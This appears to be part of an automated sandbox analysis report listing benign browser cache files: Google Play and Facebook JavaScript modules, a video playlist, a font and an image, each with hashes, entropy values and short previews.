                                                                                                                                                                                                                                  Preview:RIFFZ*..WEBPVP8 N*.......*..(.>]$.E#.!.Z..8...8....9....................?........G.......?G............j?.?.........{......e......._Z/............'.....?.....7.......o......@?.u..S..l...(|..c..k?..k.}.;...z)..........'.#.?...z..9.......OV].........}O.O.O..I......G.7...g./.....>j.I...c...g>.?..^.s.....O.?M.....K.c..?.?.?.~S...-.......O....n..?...b..~... .*... ]...U'.......1...-.........(.G1M.(.Q...%......7v.6...AX..61..[.e0....j...m0C..;0.!........Q....c.-.T...q.9..s........$E..!..f...O.-....9....~fc.?....#......}.d.}d.g..4mDs.2.F..r...b.H....:..q......k`?..f........&...]4.... .u.l.)...X]..u.E}}.u..d.......R....u..s..|...`.)=.<P......t.HpA.b...._f..A)..z..2.v..).w)r.4.P.jb:.....o..k..YC....7....P..|.....FoaR...v..nS>...-.W|..,~H......5...b\.a..........YlM(.`/.q.H...H^..IS8.E..nj...BI.....Ll.QWtJ|.h|.Xp.{a.,kK.e(....T..<..2*$...W}.v.".G.%.!..G."...O.:..k..\..R..g.Jo.....!I4....[.......B..df.......Q..p.l.K.......y{B{>....y.{..>Y$....L
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                  Entropy (8bit):5.25693583046394
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvncdGnxoV6AuGNG/QVIf5hire1DzmewQRaNw6JpyxZRNlad0:kRZTFSGnxm9I/AIfTirSz8kbRN20
                                                                                                                                                                                                                                  MD5:81875F121CA4FB331EEAB8BEAAB6A386
                                                                                                                                                                                                                                  SHA1:8307C9DB0C051C118416CEC08D0061C0CF326CEC
                                                                                                                                                                                                                                  SHA-256:840978C4D9F257A34FF14B99F6D1BCB896FC0C9805B8E060CA0ED82194692F87
                                                                                                                                                                                                                                  SHA-512:63259C4BCECBBE492CFEFA20E772E0A6F8C02EA8CC49F1403DA52767831EB22C76B9E559867EC88C237C0909AE5751C2771364004849ED57CAEE1AD28485ADE3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,C7e1Kc,CKm2Wb,EEDORb,EFQ78c,ElYdAc,FoxcOd,FuzVxc,GjTCAc,GkRiKb,HnDLGf,I8lFqf,IJGqxf,IZT63,IcVnM,J22eF,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,LcQwud,Lkzi5d,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NkwaS,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PHUIyb,PRm2u,PZ1hre,PrPYRd,QIhFr,RBsfwb,RMhBfe,RQJprf,RqjULd,SdcwHb,SpsfSb,UINLVc,ULFnWe,UUJqVe,UZStuc,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,YTx6oe,Z5uLle,ZDZcre,ZMKy0d,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,dZ05Qb,dfkSTe,e3Zld,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,g6aYuf,gKWqec,grWkAb,gychg,hKSk3e,hc6Ubd,iAQMie,iLGjNb,kJXwXb,kWgXee,kdbckd,kjKdXe,kpVlPe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,mmmrlc,n73qwf,oEJvKc,ovKuLd,pCKBF,pQUyNd,pYCIec,pjICDe,pw70Gc,q0NEmc,q0xTif,qczJ2b,qk5AGd,qqarmf,qyd4Kb,rpbmN,s39S4,sOXFj,soHxf,tKHFxf,uj8DUc,vrGZEc,w08zce,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xI1uef,xQtZb,xUdipf,xii62b,yDVVkb,yNB6me,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=Y413Bc"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("Y413Bc");._.qr(_.DCa,class extends _.rr{constructor(a){super(a.ta)}H(){return"Y413Bc"}N(){return!0}Xa(){return _.M6}});_.$q.Y413Bc=_.fB;..._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:M3U playlist, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):905
                                                                                                                                                                                                                                  Entropy (8bit):5.361446549873423
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:lfRcdcVhdcVdcIgdcf2dciUdcBTdcedc4:lfRycdcPcRcwczcfcQc4
                                                                                                                                                                                                                                  MD5:AE554E0C8CBF7B2A1F2CD56AE507A45D
                                                                                                                                                                                                                                  SHA1:E596105E518982DFB710319E098B05D41D99C048
                                                                                                                                                                                                                                  SHA-256:EB31B3FC34652722DBA7B80CFF4787C380AB3EC932412979A7095DB64E15280D
                                                                                                                                                                                                                                  SHA-512:FAFF8C5931D7311A80C447F31605F285804ED259A8F819BE64DF1DB4AA858C99D83A7AB26D04A3C288F8095D0AEA7BB2886979DC73D5B9EF37D0F80E44C518F3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:#EXTM3U.#EXT-X-TARGETDURATION:6.#EXT-X-VERSION:7.#EXT-X-MEDIA-SEQUENCE:0.#EXT-X-PLAYLIST-TYPE:VOD.#EXT-X-INDEPENDENT-SEGMENTS.#EXT-X-MAP:URI="P875466468_Anull_video_gr265_sdr_886x1920-.mp4",BYTERANGE="899@0".#EXTINF:3.60000,..#EXT-X-BYTERANGE:2126676@899.P875466468_Anull_video_gr265_sdr_886x1920-.mp4.#EXTINF:5.70000,..#EXT-X-BYTERANGE:2819907@2127575.P875466468_Anull_video_gr265_sdr_886x1920-.mp4.#EXTINF:3.53333,..#EXT-X-BYTERANGE:1156204@4947482.P875466468_Anull_video_gr265_sdr_886x1920-.mp4.#EXTINF:2.63333,..#EXT-X-BYTERANGE:926878@6103686.P875466468_Anull_video_gr265_sdr_886x1920-.mp4.#EXTINF:3.63333,..#EXT-X-BYTERANGE:2260694@7030564.P875466468_Anull_video_gr265_sdr_886x1920-.mp4.#EXTINF:5.70000,..#EXT-X-BYTERANGE:2680108@9291258.P875466468_Anull_video_gr265_sdr_886x1920-.mp4.#EXTINF:5.20000,..#EXT-X-BYTERANGE:1934725@11971366.P875466468_Anull_video_gr265_sdr_886x1920-.mp4.#EXT-X-ENDLIST.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3861)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):31218
                                                                                                                                                                                                                                  Entropy (8bit):5.324429260638175
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:so/MPtWU9Ywx3UpxbY/Y3YOgQxnYeYZYHYZYVY+Y2mSSivJjne2vh1eA+HZzqmPl:RIT7hsZwuvLN54WAclQq2
                                                                                                                                                                                                                                  MD5:E5448D39933BC347B40C9F54492F32A1
                                                                                                                                                                                                                                  SHA1:DB96BDCCF87D3E1EDFB898604D7A0F5C40D0B430
                                                                                                                                                                                                                                  SHA-256:C41ECBD066B65704841824817C3F5EB24077B8D2CFB2DF5C2550D45467C4A299
                                                                                                                                                                                                                                  SHA-512:E6724DB597500FFE1DAF103837D93D63102A94CD318076670E7D0A958766B0152CEDB5900EF21587DD36C3ACC9F6FBA6BF80A2CA1F866CC811E6C34DBD0B3058
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                  Entropy (8bit):5.230330389237522
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnmo7YAuGNG/QVI3KhiYtGeozwQRaNw6JpyxZRNlad0:kRZTFmmI/AI3siwDkbRN20
                                                                                                                                                                                                                                  MD5:8DEAA0BB0FDB9791671B9B16A6E4544A
                                                                                                                                                                                                                                  SHA1:B4132F810CD1D2A3E933558111EFDA97E075D186
                                                                                                                                                                                                                                  SHA-256:A79468E18D691FC7DB07E5FDC22EEC64BE745D4ED4A9093E79AF67E41E065F5B
                                                                                                                                                                                                                                  SHA-512:9CF8DD15ABF289BA2570D203A2D0F45CCAFC0A61DC621D61BD8455D120D7763B752A3ECEFDCC8B15C0A75F78F54CF642B68FBFFF01E86B8EC64F466F02FB508C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,C7e1Kc,CKm2Wb,EEDORb,EFQ78c,ElYdAc,FoxcOd,FuzVxc,GjTCAc,GkRiKb,HnDLGf,I8lFqf,IJGqxf,IZT63,IcVnM,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NkwaS,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PHUIyb,PZ1hre,PrPYRd,QIhFr,RBsfwb,RMhBfe,RQJprf,RqjULd,SdcwHb,SpsfSb,UINLVc,UUJqVe,UZStuc,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,dfkSTe,e3Zld,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,g6aYuf,gKWqec,grWkAb,gychg,hKSk3e,hc6Ubd,iAQMie,iLGjNb,kJXwXb,kWgXee,kjKdXe,kpVlPe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,mmmrlc,n73qwf,oEJvKc,ovKuLd,pCKBF,pQUyNd,pYCIec,pjICDe,pw70Gc,q0NEmc,q0xTif,qczJ2b,qqarmf,qyd4Kb,rpbmN,s39S4,sOXFj,soHxf,tKHFxf,uj8DUc,vrGZEc,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xQtZb,xUdipf,xii62b,yDVVkb,yNB6me,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=Lkzi5d"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("Lkzi5d");._.qr(_.jAa,class extends _.rr{constructor(a){super(a.ta)}H(){return"Lkzi5d"}N(){return!0}Xa(){return _.mAc}});_.$q.Lkzi5d=_.dQa;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (7012)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):356545
                                                                                                                                                                                                                                  Entropy (8bit):5.454861144884858
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:XV3slatr7uVNns/Rc+uojzJ5C/BRtJV5nitT6GTC7ayZZA2lcdbZiiFxEytmt7mj:V4iSojzeGteGnEKhU3CQP72nf
                                                                                                                                                                                                                                  MD5:778ECE954A9E68DBC21EDF9E76375090
                                                                                                                                                                                                                                  SHA1:4B2E19048473B40CEE1DF910EA80838A858FD8C4
                                                                                                                                                                                                                                  SHA-256:409AF97CC8E49345E77762389C4A27C44E780DE7A3AEDBEF0A01CC8A15E19248
                                                                                                                                                                                                                                  SHA-512:220431866C7F0ABB585E0D5F99C023453EFA9A01F303EE6EA2C65E083CCBCE37FFB4D84DD51BC254FCB9B89401303E4AA3614D414D08643B2825527F78266B11
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("ActiveFocusRegionUtilsContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(null);c=b;g["default"]=c}),98);.__d("BaseChameleonThemeContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b={classNames:null};c=a.createContext(b);g["default"]=c}),98);.__d("BaseDOMContainer.react",["react","useMergeRefs"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||(h=d("react"));b=h;var j=b.useLayoutEffect,k=b.useRef;e=i.forwardRef(a);function a(a,b){var d=a.node,e=k(null);j(function(){var a=e.current;if(d!=null&&a!=null){a.appendChild(d);return function(){a.removeChild(d)}}},[d]);a=c("useMergeRefs")(b,e);return i.jsx("div",{ref:a})}a.displayName=a.name+" [from "+f.id+"]";d=i.memo(e);g["default"]=d}),98);.__d("BasePortalTargetContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(document.body);g["default"]=b}),98);.__d("BasePortal.react",["BaseChameleonThemeContext","B
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3038)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):18941
                                                                                                                                                                                                                                  Entropy (8bit):5.490259234595834
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:tU4yDsD1OFIQ6GT4n9SiSAi7xnBGa8s8qVLevj9vPNpDVeVSA2aUjZAKYDgocOb3:VyDe1Oia+9SGDbaUj+nDJb
                                                                                                                                                                                                                                  MD5:FB5DEFA61F6FB338A356269C5ABA01EC
                                                                                                                                                                                                                                  SHA1:D883B45E47CF0AC862C9E0AC50744181273109FC
                                                                                                                                                                                                                                  SHA-256:4F3390730744441B70F7D2285B715923257BF0B002C1B0D3EBF476C963710084
                                                                                                                                                                                                                                  SHA-512:9D1A936FED61E58AF0D7406B06DF4C41DFE1B3FC0FABCB1D15B20891879D5DF39FF53528FF4858EF7661575694FB2AC73B24F7A1622556D853F6F399214405EA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AdsPerfTiming",["performance"],(function(a,b,c,d,e,f,g){"use strict";var h;b=(h||(h=c("performance"))).timing&&(h||c("performance")).timing.fetchStart||a._cstart;g.start=b}),98);.__d("BinarySearch",["unrecoverableViolation"],(function(a,b,c,d,e,f,g){"use strict";e={GREATEST_LOWER_BOUND:"GREATEST_LOWER_BOUND",GREATEST_STRICT_LOWER_BOUND:"GREATEST_STRICT_LOWER_BOUND",LEAST_STRICT_UPPER_BOUND:"LEAST_STRICT_UPPER_BOUND",LEAST_UPPER_BOUND:"LEAST_UPPER_BOUND",NEAREST:"NEAREST"};var h=function(a,b){if(typeof a!=="number"||typeof b!=="number")throw c("unrecoverableViolation")("The default comparator can only be used with sequences of numbers.","comet_infra");return a-b},i=e.GREATEST_LOWER_BOUND,j=e.GREATEST_STRICT_LOWER_BOUND,k=e.LEAST_STRICT_UPPER_BOUND,l=e.LEAST_UPPER_BOUND,m=e.NEAREST;function n(a,b,c,d,e){e===void 0&&(e=h);var f=l;f=p(a,b,c,d,e,f);if(c<=f&&f<d){c=a(f);return e(c,b)===0?c:void 0}else return void 0}function o(a,b,c,d,e){e===void 0&&(e=h);var f=l;f=p(a
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (6735)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):28815
                                                                                                                                                                                                                                  Entropy (8bit):5.582969537394197
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:RDfALR2Eq9iqM9iO8YMri4HJQ6deqtl4E7gqzIoTvvaiQYKhc3wSW0Dm6/mXXKO3:RDcCJQ6dBfYregv0D/+KOx1
                                                                                                                                                                                                                                  MD5:B9B91A44A89E975AD8A814EA863AF491
                                                                                                                                                                                                                                  SHA1:F56DC8A28B471EA8F0153333DD13634FB3C382F5
                                                                                                                                                                                                                                  SHA-256:B734E9ACF9AB9F17CB40B8916CB03C7544FC7915951E9D9724024AD69AAA27ED
                                                                                                                                                                                                                                  SHA-512:46943E2F2EE1A6F9823C52976BEDF2E4401161AA41ACF377A2B13A0818F003CCF6C54F7946C6051A7912A767C195DEF516F071B43685A1AC3F755A0B64B67394
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("BanzaiAdapter",["cr:5866"],(function(a,b,c,d,e,f,g){g["default"]=b("cr:5866")}),98);.__d("BanzaiConsts",[],(function(a,b,c,d,e,f){a={SEND:"Banzai:SEND",OK:"Banzai:OK",ERROR:"Banzai:ERROR",SHUTDOWN:"Banzai:SHUTDOWN",BASIC:"basic",VITAL:"vital",BASIC_WAIT:6e4,BASIC_WAIT_COMET:2e3,VITAL_WAIT:1e3,BATCH_SIZE_LIMIT:64e3,EXPIRY:864e5,BATCH_TIMEOUT:1e4,LAST_STORAGE_FLUSH:"banzai:last_storage_flush",STORAGE_FLUSH_INTERVAL:12*60*6e4,POST_READY:0,POST_INFLIGHT:1,POST_SENT:2};b=a;f["default"]=b}),66);.__d("BanzaiUtils",["BanzaiConsts","FBLogger","cr:1172","cr:9985","cr:9986"],(function(a,b,c,d,e,f){"use strict";var g,h={canSend:function(a){return a[2]>=b("cr:9985")()-(g||(g=b("BanzaiConsts"))).EXPIRY},filterPost:function(a,c,d,e){if(e.overlimit)return!0;if(!e.sendMinimumOnePost&&a[4]+e.currentSize>(g||(g=b("BanzaiConsts"))).BATCH_SIZE_LIMIT)return!0;var f=a.__meta;if(f.status!=null&&f.status>=(g||(g=b("BanzaiConsts"))).POST_SENT||!h.canSend(a))return!1;if(f.status!=null&&f.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (967)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5547
                                                                                                                                                                                                                                  Entropy (8bit):5.651519503298511
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:kN3A2LJ8pndjf179G4b0GetUsKLBBxblBbejvQiHRG7fyDePG5gyh//4FKMapIEv:kN3A2aJfZ9jbHIvhHRGwrLf4HFKiJSbl
                                                                                                                                                                                                                                  MD5:05D0E376A54AD12C73A826BC13A59D87
                                                                                                                                                                                                                                  SHA1:BEBAE9CB2FA6551277F664A8C28DB7678AE1CF5B
                                                                                                                                                                                                                                  SHA-256:BA8C5C728869224D1FC8C0CBD0F818113D225C9ABD8E8C0E6E84EB17BC81D238
                                                                                                                                                                                                                                  SHA-512:CD01085B7035340B327BA45F54F854C7F10F277CBAAC9E7DFABDD2DCA32B26EEF579EC01586E3C57F0984C0F2DAE7AB903112135DE19E6127D2ADA4B11032F7D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.uDa=_.B("lDZ2Fb",[_.pr]);._.u("lDZ2Fb");.var ncc=class extends _.z{constructor(a){super(a)}};ncc.prototype.oa="K4YEGe";var occ=class extends _.z{constructor(a){super(a)}},pcc=[2,3],qcc=class extends _.z{constructor(a){super(a)}hb(){return _.F(this,_.at,4)}},rcc=[7],scc=class extends _.z{constructor(a){super(a)}UB(){return _.F(this,_.x1b,4)}};scc.prototype.oa="swBvle";var tcc=[2,3],ucc=class extends _.z{constructor(a){super(a)}},vcc=class extends _.z{constructor(a){super(a)}};vcc.prototype.oa="XMKGyc";.var wcc,xcc,ycc,zcc,Acc,Bcc=function(a,b,c,d){var e=_.AW(c.hb()?.H());const f=e?"3121|"+e:"3121";e=_.X(h=>{_.fh(c,_.Ng(c,pcc,2))!=null?(h.open("p","WcV9v"),h.ha("class",d?d:""),h.U(),h.print(_.L(c,_.Ng(c,pcc,2))),h.close()):_.Og(c,_.ht,3,pcc)&&h.print(_.yW(_.J(c,_.ht,3,pcc)))});const g=_.QN(h=>{h.ha("target","_blank");_.RN(h,_.ON(""));h.ha("jslog","197536; 1:"+f+"; track:impression,clic
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 162924, version 1.0
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):162924
                                                                                                                                                                                                                                  Entropy (8bit):7.998614826254304
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:3072:XdhkQyBlHVVYwHUFDrzXtPz/qJwZmUyhjpimMS6DW4hb59a06EziVFKth8Biq:wQyBBvYw0FD/tPWJZjI3PXhbrduVFc8f
                                                                                                                                                                                                                                  MD5:7F2E1B48B71EC58FDA4539018A2F56CC
                                                                                                                                                                                                                                  SHA1:507BF81F52FA8C99BF2C5C8BD59A981899CA9995
                                                                                                                                                                                                                                  SHA-256:7F80C4C91054B3D6C80721939242C2D4F68F15E41F251E12641F695D78EB2F35
                                                                                                                                                                                                                                  SHA-512:DD7B52119D1179332147984F6C7D8CDCB3388AEB1E8AF708EF9036ACDDE6E7B3900ACC965221F4E4864DAD89797072E19E5B308CF065A65DDA7656BE884CDD77
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/materialiconsextended/v151/kJEjBvgX7BgnkSrUwT8UnLVc38YydejYY-oE_LvJ.woff2
                                                                                                                                                                                                                                  Preview:wOF2......|l..........|..................................`..P..........N.....6.$.... .... [.m.A.B.$...c....5s/E...%.u..v..J6...:......;............$........@..M..... 8.HA.6%R...tB ..D..M".f.$G.....<....~.y;..R..23.S.T...p...'V{|u.,S....Z...lZ)..Dc..D..;=n...V...<.X6...h.......:sw.....T.6.eF..!=*.f..H\..dDd*.q"s.E.Q......JT..v..#Mf"sH}A.>.....q.h.mLC...Q..Cv...+|.u......6..B...I......K..I...R.[..m(...P<B."R.Ap.f.j:.o...\o..L..G3Yn.C..........\rI..$$!DH.!....v0r.E...p..WK.v...muW...*X.[. ......j...1\U..8V.&.X..i.T^TO..^\......&.g2Iv....>.J(.T.*..y...v....4.f..a....$.K...M-5...1D.ya...'.'...A ....!.@..c...$.D.3q..:...:&O.rV..V..v.m...[-.Z..m.......:o......$}.h..i.N.FH.$(..Zq....v...k. ._.A...J&.J..D.......>...~!...H.".$........_...;v...*gU....W Y3lI...;.....RG.....|.rw.. ..=@.....N.....=.W..=O.(...`..M......Y..&.O. R..'0.~6@$.4f.`I@.dV{..YJ[j`v).1(.L.."(oO...R...cI(.l.K..P,1.C.b....A=,u.B....;wm..H{.>......8e.8d.2.~.4.CDDDDDDDD..|.Z..s.G!.._.....
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (7012)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):356138
                                                                                                                                                                                                                                  Entropy (8bit):5.45076746390211
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:XV3slatr7uVNns/RV+uojzv5C/BRtJV5nitT6GTC7ayZZA2lcdbZiiFxEytmt7my:V4iBojzYGteGnEKhU3C5rQ2kf
                                                                                                                                                                                                                                  MD5:E8A499F06B95FAFA1655C0560E51BE43
                                                                                                                                                                                                                                  SHA1:F2E2566A2F011BD0605A2EDE079015E3508F0DB6
                                                                                                                                                                                                                                  SHA-256:6DF0CC8AC7A1DD4A7FB2466B264224D1713151E3C319D6B0D94168D6E7CECE7D
                                                                                                                                                                                                                                  SHA-512:7F0D086033A5A991F52D2FFA04396121C41DE3A93F4AEAB2AFCDCC2E88353F56516F3261D5EE616DD258A7FF64A0F7469F0462979A5493802EA0D82F17F90698
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
